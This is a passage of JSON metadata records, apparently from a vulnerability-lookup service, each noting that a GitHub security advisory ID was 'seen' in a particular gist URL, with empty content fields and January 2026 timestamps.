"d682a826-be04-48f8-b210-16176ab676da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69f9-5gxw-wvc2", "type": "seen", "source": "https://gist.github.com/alon710/a70de37a9bed25a93e5cc07c1825f585", "content": "", "creation_timestamp": "2026-01-24T21:31:06.000000Z"}, {"uuid": "ede352cc-b7c7-498a-a4f1-1e4f5ac9f41b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69f9-5gxw-wvc2", "type": "seen", "source": "https://gist.github.com/alon710/d933cf1d26a86bd97e8178c2f7cb58d2", "content": "", "creation_timestamp": "2026-01-24T21:31:05.000000Z"}, {"uuid": "8a94e042-0969-49d3-aaca-929185e482e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fh55-r93g-j68g", "type": "seen", "source": "https://gist.github.com/alon710/fa9ca1e6486e2d8387548a61c61214e1", "content": "", "creation_timestamp": "2026-01-24T21:31:05.000000Z"}, {"uuid": "98711702-8390-4798-96b4-2b94d0f98d06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fh55-r93g-j68g", "type": "seen", "source": "https://gist.github.com/alon710/455290c62352939a2aabb779373c4d79", "content": "", "creation_timestamp": "2026-01-24T21:31:04.000000Z"}, {"uuid": "f8fb69d9-a520-440b-9f10-d03e3fd08629", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g84x-mcqj-x9qq", "type": "seen", "source": "https://gist.github.com/alon710/0f44d8b7923e53ec43c58b6a0a74ea41", "content": "", "creation_timestamp": "2026-01-24T21:31:02.000000Z"}, {"uuid": "ad3d28e5-9a39-453b-b134-646708760679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g84x-mcqj-x9qq", "type": "seen", "source": "https://gist.github.com/alon710/7f8381f8f04af1ec16d951c6ebd1b451", "content": "", "creation_timestamp": "2026-01-24T21:31:02.000000Z"}, {"uuid": "61e72deb-0585-40d6-8fc8-0c73d7dee267", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6jhg-hg63-jvvf", "type": "seen", "source": "https://gist.github.com/alon710/bbe50bbb4613ed99077b035d511e5d3c", "content": "", "creation_timestamp": "2026-01-24T21:31:01.000000Z"}, {"uuid": "c8595a73-72ff-46d5-9b09-3cdf84d699b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6jhg-hg63-jvvf", "type": "seen", "source": "https://gist.github.com/alon710/8b3299aac7c619edde4755a5c764a295", "content": "", "creation_timestamp": "2026-01-24T21:31:00.000000Z"}, {"uuid": "03ea2119-6665-47ed-a22d-a7f7824ec54d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jj3x-wxrx-4x23", "type": "seen", "source": "https://gist.github.com/alon710/fce1c07930335c71cf4b62d3ec96c48b", "content": "", "creation_timestamp": "2026-01-24T21:31:00.000000Z"}, {"uuid": "6cdfe6a9-3deb-48b5-bf28-9ff4bdb1eab6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jj3x-wxrx-4x23", "type": "seen", "source": "https://gist.github.com/alon710/1b45b82922fa5e55afa880ecaef0724f", "content": "", "creation_timestamp": "2026-01-24T21:30:59.000000Z"}, {"uuid": "dd42bc26-8a50-4bff-8a5c-d7c3dd105de1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54jq-c3m8-4m76", "type": "seen", "source": "https://gist.github.com/alon710/c89fe6df74df0e4f959282eab6ca4385", "content": "", "creation_timestamp": "2026-01-24T21:30:59.000000Z"}, {"uuid": "e769b0b9-80d7-4a0d-81f5-09dc54bad819", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54jq-c3m8-4m76", "type": "seen", "source": "https://gist.github.com/alon710/98606eb327b2cdce4c93eef6a0e6b646", "content": "", "creation_timestamp": "2026-01-24T21:30:58.000000Z"}, {"uuid": "a300ca67-a53e-4a23-96ed-3357c2f770e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mqqc-3gqh-h2x8", "type": "seen", "source": "https://gist.github.com/alon710/4d95fa5234998ffc422c2ecdfe685ef9", "content": "", "creation_timestamp": "2026-01-24T21:30:58.000000Z"}, {"uuid": "57a16a25-03b0-4ed0-afb0-acc92ac7279d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mqqc-3gqh-h2x8", "type": "seen", "source": "https://gist.github.com/alon710/5f42a3764965ac1bcbc45356fbe43109", "content": "", "creation_timestamp": "2026-01-24T21:30:57.000000Z"}, {"uuid": "883c5c61-0a9d-40f0-972b-7e843b94bb80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mq8-rvhq-8wgg", "type": "seen", "source": "https://gist.github.com/alon710/4e5f6c4483f93db74a13930ddd8add9e", "content": "", "creation_timestamp": "2026-01-24T21:30:56.000000Z"}, {"uuid": "d109d5a5-454b-4936-83e5-e65121bdf00b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m9rg-mr6g-75gm", "type": "seen", "source": "https://gist.github.com/alon710/9548a190fad3fb182bdbcb50851ff18c", "content": "", "creation_timestamp": "2026-01-24T21:30:55.000000Z"}, {"uuid": "e16f795f-b6b2-4c01-a07d-96661cb3eb65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-829q-m3qg-ph8r", "type": "seen", "source": "https://gist.github.com/alon710/57332bff92358939e94c6163adaac37b", "content": "", "creation_timestamp": "2026-01-24T21:30:53.000000Z"}, {"uuid": "5c8e721f-509c-48cc-a39c-4527eb4424e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9C48-W39G-HM26", "type": "seen", "source": "https://gist.github.com/alon710/ccae86fb73ee8738a2887b80dcfa8185", "content": "", "creation_timestamp": "2026-01-24T21:30:44.000000Z"}, {"uuid": "920bc07a-0934-4142-b7b1-87c8bf04c412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-829q-m3qg-ph8r", "type": "seen", "source": "https://gist.github.com/alon710/ce6529fd3c682e823810fbc8215f9df8", "content": "", "creation_timestamp": "2026-01-24T21:30:52.000000Z"}, {"uuid": "217829ca-faff-44e5-a3d9-360ed4ae022c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrjc-q2fh-6x9h", "type": "seen", "source": "https://gist.github.com/alon710/44719f652303c10a729f24ed8844c51e", "content": "", "creation_timestamp": "2026-01-24T21:30:52.000000Z"}, {"uuid": "20a46a53-8a97-4f83-89cd-0dbdcc52585a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrjc-q2fh-6x9h", "type": "seen", "source": "https://gist.github.com/alon710/6e5c6e0a4964b775b042b00e78306bf4", "content": "", "creation_timestamp": "2026-01-24T21:30:51.000000Z"}, {"uuid": "38c28b4d-f1ee-4c3b-8f78-3ca54b34028f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9rg3-9pvr-6p27", "type": "seen", "source": "https://gist.github.com/alon710/701adf8962df6a6f251174e6087c868d", "content": "", "creation_timestamp": "2026-01-24T21:30:21.000000Z"}, {"uuid": "cb907731-f9b2-4b29-a6a8-5a6792683076", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MW6-MJ76-GRWC", "type": "seen", "source": "https://gist.github.com/alon710/d914cef57d3f53543037ad495b44bb69", "content": "", "creation_timestamp": "2026-01-24T21:30:47.000000Z"}, {"uuid": "bf08b26f-f045-45d3-bb83-7363b0d859a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6MW6-MJ76-GRWC", "type": "seen", "source": "https://gist.github.com/alon710/b98e74709e45ce1d97fc3eef0f77b652", "content": "", "creation_timestamp": "2026-01-24T21:30:46.000000Z"}, {"uuid": "04b40965-7907-443c-9b36-7098776f11db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjpc-4f29-83h3", "type": "seen", "source": "https://gist.github.com/alon710/77c431497cdbafe417c74b730ab69721", "content": "", "creation_timestamp": "2026-01-24T21:30:45.000000Z"}, {"uuid": "a62f613e-eca8-4445-85b0-9dbb59712054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9C48-W39G-HM26", "type": "seen", "source": "https://gist.github.com/alon710/c2b5d108d0b2c4cdd16f9174133b2e40", "content": "", "creation_timestamp": "2026-01-24T21:30:45.000000Z"}, {"uuid": "5eb5948f-a5a3-4b2e-90f6-994c6372f31e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q9f5-625g-xm39", "type": "seen", "source": "https://gist.github.com/alon710/19367fed712521a1833c7c1711d66e07", "content": "", "creation_timestamp": "2026-01-24T21:30:35.000000Z"}, {"uuid": "7e7545bc-0bbb-41df-84ad-b7ec19525952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-793v-589g-574v", "type": "seen", "source": "https://gist.github.com/alon710/1a8cdfc9ee48e8684ff81a0e3d627083", "content": "", "creation_timestamp": "2026-01-24T21:30:26.000000Z"}, {"uuid": "152df3ef-ee76-43de-9c83-5209f10791f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v364-rw7m-3263", "type": "seen", "source": "https://gist.github.com/alon710/767f0f2e43aced949d3094baae180a5c", "content": "", "creation_timestamp": "2026-01-24T21:30:25.000000Z"}, {"uuid": "81a31c5d-ece2-41c4-a2f1-79baf6ab278e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hjr9-wj7v-7hv8", "type": "seen", "source": "https://gist.github.com/alon710/442846c1654b53e08cd06e03a0540301", "content": "", "creation_timestamp": "2026-01-24T21:30:44.000000Z"}, {"uuid": "08a069b2-1ab3-408e-a144-3eceb0eca8fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f3gw-9ww9-jmc3", "type": "seen", "source": "https://gist.github.com/alon710/9ae22252a01711933c801903c50fff8f", "content": "", "creation_timestamp": "2026-01-24T21:30:29.000000Z"}, {"uuid": "77527bac-6d6c-4075-aba3-00b8f53efaba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hjr9-wj7v-7hv8", "type": "seen", "source": "https://gist.github.com/alon710/08e9fba6aa798716d634e3b78b79aa7f", "content": "", "creation_timestamp": "2026-01-24T21:30:43.000000Z"}, {"uuid": "9da954ca-5d37-42df-a6cb-79ecb7daca0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3573-4c68-g8cc", "type": "seen", "source": "https://gist.github.com/alon710/dcdaca8d601fa752827d1ab1c6bfe984", "content": "", "creation_timestamp": "2026-01-24T21:30:43.000000Z"}, {"uuid": "6990d6d5-d061-431d-a4bb-8ad619246fa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rxwq-x6h5-x525", "type": "seen", "source": "https://gist.github.com/alon710/2199c611ce8981e883f1ab541a397899", "content": "", "creation_timestamp": "2026-01-24T21:30:42.000000Z"}, {"uuid": "a32aa81b-1244-4916-a6ac-3cce8acceb8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3573-4c68-g8cc", "type": "seen", "source": "https://gist.github.com/alon710/0353b77d527ce0d878ab26e70dd7a91d", "content": "", "creation_timestamp": "2026-01-24T21:30:42.000000Z"}, {"uuid": "b2ff774c-9b54-45f6-a4c5-6582289dea48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rxwq-x6h5-x525", "type": "seen", "source": "https://gist.github.com/alon710/3ba3aa2b7b17166a424b900a6c87a11f", "content": "", "creation_timestamp": "2026-01-24T21:30:41.000000Z"}, {"uuid": "c18197e5-052c-4f81-ac16-4038250913a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jc7g-x28f-3v3h", "type": "seen", "source": "https://gist.github.com/alon710/128173bdf7a72d5dd0cfdf8f4e2ec93f", "content": "", "creation_timestamp": "2026-01-24T21:30:40.000000Z"}, {"uuid": "32711a3b-9a37-403b-95a7-dd00acddf116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jc7g-x28f-3v3h", "type": "seen", "source": "https://gist.github.com/alon710/2aeb9181d822da66f0341f802419d7a7", "content": "", "creation_timestamp": "2026-01-24T21:30:38.000000Z"}, {"uuid": "09121490-c83f-435f-af21-236bcc92f6c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2hj5-g64g-fp6p", "type": "seen", "source": "https://gist.github.com/alon710/f87bedb2ffb02f9399920c206ccf8ca9", "content": "", "creation_timestamp": "2026-01-24T21:30:38.000000Z"}, {"uuid": "310b7edd-1df7-447d-95e1-5d795e4e9b45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2hj5-g64g-fp6p", "type": "seen", "source": "https://gist.github.com/alon710/da6cd5684b398c9cf5fbb614e2ac5c8a", "content": "", "creation_timestamp": "2026-01-24T21:30:37.000000Z"}, {"uuid": "82057f00-1f79-4ea1-865d-f4119d5009cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f2mf-q878-gh58", "type": "seen", "source": "https://gist.github.com/alon710/a73dddc7e65da25fc3a71175b5e38821", "content": "", "creation_timestamp": "2026-01-24T21:30:37.000000Z"}, {"uuid": "8557b9d4-64e1-41ee-81ed-92a66568bdc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f2mf-q878-gh58", "type": "seen", "source": "https://gist.github.com/alon710/9ef63edfc6dc58503819febec2f862c0", "content": "", "creation_timestamp": "2026-01-24T21:30:36.000000Z"}, {"uuid": "3bb9f7ec-716f-4359-81d5-d6a88db2f62e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g2j6-57v7-gm8c", "type": "seen", "source": "https://gist.github.com/alon710/eb849aea819b3774b631ff82f7f2e529", "content": "", "creation_timestamp": "2026-01-24T21:32:18.000000Z"}, {"uuid": "5b1380bb-0785-44ba-a4e5-10c047781be2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q9f5-625g-xm39", "type": "seen", "source": "https://gist.github.com/alon710/c2368f00bd72d41149f54bfc49fec47c", "content": "", "creation_timestamp": "2026-01-24T21:30:36.000000Z"}, {"uuid": "f6366c1f-8ab0-4b94-b6da-c6c7090ca290", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gg4x-fgg2-h9w9", "type": "seen", "source": "https://gist.github.com/alon710/6257da1e888647115d820390750879ee", "content": "", "creation_timestamp": "2026-01-24T21:30:33.000000Z"}, {"uuid": "9ec61218-bebc-43c4-bbf8-26bbcada91e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gg4x-fgg2-h9w9", "type": "seen", "source": "https://gist.github.com/alon710/ecdbc01c3c96ce665a77ba8b31b2fc40", "content": "", "creation_timestamp": "2026-01-24T21:30:31.000000Z"}, {"uuid": "008e14cd-a437-4610-9400-05f5e637666a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f3gw-9ww9-jmc3", "type": "seen", "source": "https://gist.github.com/alon710/e589cf0bc7a54574edafd652b4a30658", "content": "", "creation_timestamp": "2026-01-24T21:30:30.000000Z"}, {"uuid": "db8ce2bc-dd09-4683-b516-932c7d75ed2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8v65-47jx-7mfr", "type": "seen", "source": "https://gist.github.com/alon710/2b769ce4e8fadf7fe92277792f4eb87c", "content": "", "creation_timestamp": "2026-01-24T21:30:24.000000Z"}, {"uuid": "0c265738-6715-40ad-aa15-31a41205c716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xr7r-f8xq-vfvv", "type": "seen", "source": "https://gist.github.com/alon710/2797ff918da18cd8efb7dd0b447a880e", "content": "", "creation_timestamp": "2026-01-24T21:32:25.000000Z"}, {"uuid": "8fe6b790-9a4c-4bf6-a207-08b9cfd93619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9jg-w8vm-g96v", "type": "seen", "source": "https://gist.github.com/alon710/df1bf1d23638a11f4cb8426d2c78ed2c", "content": "", "creation_timestamp": "2026-01-24T21:32:11.000000Z"}, {"uuid": "37e17293-30a8-46ec-b2fe-59d63a11c319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f456-rf33-4626", "type": "seen", "source": "https://gist.github.com/alon710/31fc37eb0889b0964976a742b1de957a", "content": "", "creation_timestamp": "2026-01-24T22:17:24.000000Z"}, {"uuid": "47962d48-87a8-4f67-bad4-1cf8cf3d2272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f456-rf33-4626", "type": "seen", "source": "https://gist.github.com/alon710/ab913cf59e50406b2e8cd1b1a7171e0d", "content": "", "creation_timestamp": "2026-01-24T22:17:21.000000Z"}, {"uuid": "1a9e9ab9-444a-4b9f-acc3-1acfe6181497", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3jqf-v4mv-747g", "type": "seen", "source": "https://gist.github.com/alon710/869af24180d0a2657b3c7c0c87152b32", "content": "", "creation_timestamp": "2026-01-24T22:17:18.000000Z"}, {"uuid": "d971d206-b602-4e5c-802f-c53525881190", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3jqf-v4mv-747g", "type": "seen", "source": "https://gist.github.com/alon710/a1704b9ca809b7c44848d646f56c4c53", "content": "", "creation_timestamp": "2026-01-24T22:17:16.000000Z"}, {"uuid": "50094ec2-da5d-453d-9286-1b172a78e4f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3V2X-9XCV-2V2V", "type": "seen", "source": "https://gist.github.com/alon710/f049dd87c36fc1f6a477617ddacb2cf3", "content": "", "creation_timestamp": "2026-01-24T22:17:12.000000Z"}, {"uuid": "382baa33-02b9-4f5a-a416-ee878b7c613e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3V2X-9XCV-2V2V", "type": "seen", "source": "https://gist.github.com/alon710/67d93d47b433a50ac914d2b972da8d34", "content": "", "creation_timestamp": "2026-01-24T22:17:10.000000Z"}, {"uuid": "3c903d8c-20fa-42cc-89e9-32522947d2bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7JXJ-RPX7-PH2C", "type": "seen", "source": "https://gist.github.com/alon710/7677fdf2ce15f7fe170a6750f40fdd7a", "content": "", "creation_timestamp": "2026-01-24T22:17:07.000000Z"}, {"uuid": "10870e72-ad69-4d83-907e-31f3a6af2df1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7JXJ-RPX7-PH2C", "type": "seen", "source": "https://gist.github.com/alon710/59dbc024d388f24e75ae769d8151f5ce", "content": "", "creation_timestamp": "2026-01-24T22:17:04.000000Z"}, {"uuid": "b9be4e91-6ad8-4c22-8f53-3f353ce7aca4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j8hf-cp34-g4j7", "type": "seen", "source": "https://gist.github.com/alon710/27d6c3bd341578e3a05c54267b3313a4", "content": "", "creation_timestamp": "2026-01-24T22:17:01.000000Z"}, {"uuid": "8b6c7031-8de3-44dd-a5dd-1404e1d604cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j8hf-cp34-g4j7", "type": "seen", "source": "https://gist.github.com/alon710/6776724fc7cb5ec4fc8bfd427ddaca12", "content": "", "creation_timestamp": "2026-01-24T22:16:58.000000Z"}, {"uuid": "9c4a6fbf-aba2-4ec4-8e0f-37758bdede60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8rrh-rw8j-w5fx", "type": "seen", "source": "https://gist.github.com/alon710/4786281af84c9809783d429fe21b0f58", "content": "", "creation_timestamp": "2026-01-24T22:16:55.000000Z"}, {"uuid": "4f96ae56-9ee5-4062-8981-e1f0be8acd54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8rrh-rw8j-w5fx", "type": "seen", "source": "https://gist.github.com/alon710/2880d368c50f9994ba3aa11a923254b7", "content": "", "creation_timestamp": "2026-01-24T22:16:52.000000Z"}, {"uuid": "653afb7a-3de7-4c01-8392-0428aa2a7b1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vqxf-v2gg-x3hc", "type": "seen", "source": "https://gist.github.com/alon710/0d9cdf62717d80901cfb58437a588c84", "content": "", "creation_timestamp": "2026-01-24T22:16:49.000000Z"}, {"uuid": "0f283900-13e3-442e-b4f4-ca47465fa3c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vqxf-v2gg-x3hc", "type": "seen", "source": "https://gist.github.com/alon710/09943518daa9a525ed9c22ccccf2a59f", "content": "", "creation_timestamp": "2026-01-24T22:16:46.000000Z"}, {"uuid": "fac1d614-9b2f-4dc4-b6bb-ca291b40a905", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3j22-8qj3-26mx", "type": "seen", "source": "https://gist.github.com/alon710/7a76b64aa58a02c54677f587ee5f8286", "content": "", "creation_timestamp": "2026-01-24T22:16:43.000000Z"}, {"uuid": "66661859-6f72-4d0a-820f-f169d3184a1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3j22-8qj3-26mx", "type": "seen", "source": "https://gist.github.com/alon710/eac01783d38aea2ecadbcd3538b78835", "content": "", "creation_timestamp": "2026-01-24T22:16:41.000000Z"}, {"uuid": "44d88aed-c84c-406f-8713-d4e3ef04f89c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xc5-wfwc-jw47", "type": "seen", "source": "https://gist.github.com/alon710/0a1ae1521b580862601157c7f9bb03db", "content": "", "creation_timestamp": "2026-01-24T22:16:37.000000Z"}, {"uuid": "906c73fd-4bee-4555-ad0b-f7c592e9f3d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xc5-wfwc-jw47", "type": "seen", "source": "https://gist.github.com/alon710/2f37f44190d816a945e9b4fe5951c151", "content": "", "creation_timestamp": "2026-01-24T22:16:35.000000Z"}, {"uuid": "16ae7510-9f4d-487e-a7d8-c20b1063f989", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qqpg-mvqg-649v", "type": "seen", "source": "https://gist.github.com/alon710/069791bb60c2909f474364d69b934ae2", "content": "", "creation_timestamp": "2026-01-24T22:16:31.000000Z"}, {"uuid": "1a969c0c-bd75-4c48-961d-97b18f778efa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qqpg-mvqg-649v", "type": "seen", "source": "https://gist.github.com/alon710/824ef3b238f92b5b3005843173fa3d15", "content": "", "creation_timestamp": "2026-01-24T22:16:29.000000Z"}, {"uuid": "42d6f2f0-3cf3-4150-8f02-f052151b4e44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C32P-WCQJ-J677", "type": "seen", "source": "https://gist.github.com/alon710/46146de3b67eb6c5595d34acd6186f91", "content": "", "creation_timestamp": 